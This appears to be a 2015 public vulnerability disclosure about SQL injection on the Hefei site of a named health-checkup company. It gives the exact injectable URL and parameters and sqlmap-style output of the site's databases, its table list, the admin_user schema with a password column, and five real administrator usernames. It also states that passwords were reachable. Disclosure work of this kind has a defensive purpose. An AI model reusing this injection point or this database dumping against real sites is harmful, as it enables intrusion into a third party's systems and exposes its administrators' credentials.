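2015-08-28: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public
2015-10-12: The vendor has actively ignored the vulnerability; details are disclosed to the public
Ciming Health Checkup Group: injection on the Hefei site
Injection point: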
http://www.hefeiciming.com/tjsb_list.php?cat_pid=33&cat_id=34
Dumped data
available databases [2]:
[*] information_schema
[*] sqlhefeiciming

Database: sqlhefeiciming
[28 tables]
+------------------+
| user             |
| admin_mod        |
| admin_user       |
| admin_useroption |
| art_dis_config   |
| article          |
| category         |
| cnt              |
| color_code       |
| comes            |
| company_email    |
| control_sys      |
| cr_columninfo    |
| doc_useroption   |
| docuser          |
| edit_type        |
| info_set         |
| information      |
| iplist           |
| message          |
| order_goods      |
| order_product    |
| set_value        |
| shopproduct      |
| shopuser         |
| shu              |
| survey           |
| urls             |
+------------------+

Database: sqlhefeiciming
Table: admin_user
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| date     | datetime    |
| id       | int(11)     |
| realname | varchar(40) |
| username | varchar(64) |
| userpswd | varchar(64) |
| usertype | varchar(20) |
+----------+-------------+

Database: sqlhefeiciming
Table: admin_user
[5 entries]
+-----------+
| username  |
+-----------+
| admin     |
| cm_admin  |
| seo123    |
| web_admin |
| wj_admin! |
+-----------+
Passwords
In summary
You get the idea
Unable to contact the vendor, or the vendor actively refused